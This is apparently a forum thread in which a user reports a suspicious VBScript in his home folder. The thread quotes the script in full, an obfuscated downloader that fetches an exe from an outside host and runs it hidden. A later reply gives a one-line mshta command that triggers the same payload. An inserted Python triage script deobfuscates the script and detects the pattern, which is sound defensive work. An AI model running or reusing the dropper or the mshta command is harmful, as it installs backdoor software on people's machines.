bonarez
When I need to dl something quickly I usually open a cmd and wget it. By default it opens my homedir, and today I found a weird vbs in this dir:
CODE

Dim i
Dim j
' ProgID built by string concatenation so a plain-text scan for "Microsoft.XMLHTTP" misses it
Set j = CreateObject("M"+"i"+"c"+"r"+"o"+"s"+"o"+"f"+"t"+"."+"X"+"M"+"L"+"H"+"T"+"T"+"P")
' synchronous HTTP GET of the payload; the raw bytes land in i
j.Open "GET", "http://sec.gravito.com/hta3/test.exe", False
j.Send
i = j.ResponseBody
Const k = 1   ' adTypeBinary
Const l = 2   ' adSaveCreateOverWrite
Dim m
' ADODB.Stream, again concatenated, writes the bytes to disk as test.exe
Set m = CreateObject("A"+"D"+"O"+"D"+"B"+"."+"S"+"t"+"r"+"e"+"a"+"m")
m.Type = k
m.Open
m.Write i
m.SaveToFile "test.exe", l
Dim n
' WScript.Shell runs the dropped file; window style 0 = hidden, false = do not wait
Set n = CreateObject("W"+"S"+"c"+"r"+"i"+"p"+"t"+"."+"S"+"h"+"e"+"l"+"l"+"")
n.Run "test.exe", 0, false


I already tried dl the exe myself, and my av detects it as being BDS/Iwill.A.3

now is this some remaining code from some program I dl from govsec? since a google for gravito led me to a link in a certain govsec member's signature...

If anyone could clear this up, plz. I hate feeling 'compromised'.
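The script in the post above hides its ProgIDs behind "M"+"i"+"c"+... concatenation, which is exactly the kind of thing a signature on the literal string "Microsoft.XMLHTTP" does not catch. As an added example (not code from the thread or from any member's tool), here is a small triage script that folds VBScript string concatenation back into literals, lists the COM objects a script creates, and flags the download / write-to-disk / execute chain. The embedded sample is a constructed copy of the post's script with a placeholder URL; the ProgID-to-stage table covers the objects commonly used for that chain.

```python
import re

# Constructed sample modelled on the .vbs quoted in the post; the URL is a placeholder.
SAMPLE_VBS = '''Dim i
Dim j
Set j = CreateObject("M"+"i"+"c"+"r"+"o"+"s"+"o"+"f"+"t"+"."+"X"+"M"+"L"+"H"+"T"+"T"+"P")
j.Open "GET", "http://example.invalid/payload.exe", False
j.Send
i = j.ResponseBody
Set m = CreateObject("A"+"D"+"O"+"D"+"B"+"."+"S"+"t"+"r"+"e"+"a"+"m")
m.Type = 1
m.Open
m.Write i
m.SaveToFile "payload.exe", 2
Set n = CreateObject("W"+"S"+"c"+"r"+"i"+"p"+"t"+"."+"S"+"h"+"e"+"l"+"l"+"")
n.Run "payload.exe", 0, false
'''

# A run of quoted literals joined by + or & (both are VBScript concatenation).
CONCAT_RE = re.compile(r'"[^"]*"(?:\s*[+&]\s*"[^"]*")+')
CREATEOBJECT_RE = re.compile(r'CreateObject\s*\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)

# Which part of a download-and-execute chain each ProgID typically serves.
STAGE_OF = {
    "microsoft.xmlhttp": "download",
    "msxml2.xmlhttp": "download",
    "msxml2.serverxmlhttp": "download",
    "adodb.stream": "write-to-disk",
    "scripting.filesystemobject": "write-to-disk",
    "wscript.shell": "execute",
    "shell.application": "execute",
}


def fold_string_concat(script: str) -> str:
    """Rewrite "a"+"b"&"c" into "abc" so literal-based checks see the real value."""
    def join(match: re.Match) -> str:
        parts = re.findall(r'"([^"]*)"', match.group(0))
        return '"' + "".join(parts) + '"'
    return CONCAT_RE.sub(join, script)


def created_objects(script: str) -> list:
    """ProgIDs passed to CreateObject, lower-cased, in order of appearance."""
    return [m.lower() for m in CREATEOBJECT_RE.findall(script)]


def analyse(script: str) -> dict:
    """Deobfuscate, inventory COM objects and URLs, and give a verdict on the chain."""
    folded = fold_string_concat(script)
    objects = created_objects(folded)
    stages = {STAGE_OF[o] for o in objects if o in STAGE_OF}
    chain = {"download", "write-to-disk", "execute"}
    return {
        "obfuscated": folded != script,      # concatenation was actually used
        "objects": objects,
        "stages": stages,
        "urls": URL_RE.findall(folded),
        "verdict": "download-and-execute" if chain <= stages
                   else "no download-and-execute chain",
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_VBS)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Folding the concatenation first is the important step: once the ProgIDs read as plain literals, the combination of an HTTP client, a binary stream writer and a shell runner in one short script is a strong signal on its own, and the extracted URL is what you would hand to whoever manages the proxy or DNS logs.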
BuzzDee
maybe u clicked one of illwill's PoC links? ;D
bonarez
last one was illmob.org/0day/firefox-download-and-execute.html, but this one just created a bat..

I'm probably getting way too paranoid biggrin.gif
bonarez
found it:

topic 13720

should have searched more before getting so paranoid! biggrin.gif
ComSec
lol, as soon as I saw the sec.gravito in the code .... I knew it was one of Yorn's tricks wink.gif

glad your paranoia has subsided laugh.gif
Yorn
Yeah, you can probably ignore this if you've ever run the command:
"mshta http://sec.gravito.com/hta3/?test.exe+RUN"

I think most AV pick this up now, but McAfee doesn't. I haven't added in the randomization variable because it's not important.

And yeah, it's one of my tricks, no need to be paranoid. I'm not malicious, though I really could be if I wanted to go professional criminal. tongue.gif
bonarez
tried running it again, just curious.

C:\DOCUMENTS AND.....\CONTENT.IE5\AJIVEX23\TEST[1].EXE

Contains a signature of the (dangerous) backdoor program BDS/Iwill.A.3 Backdoor server programs.

edit: running free-av but doesn't complain about the hta
Invision Power Board © 2001-2005 Invision Power Services, Inc.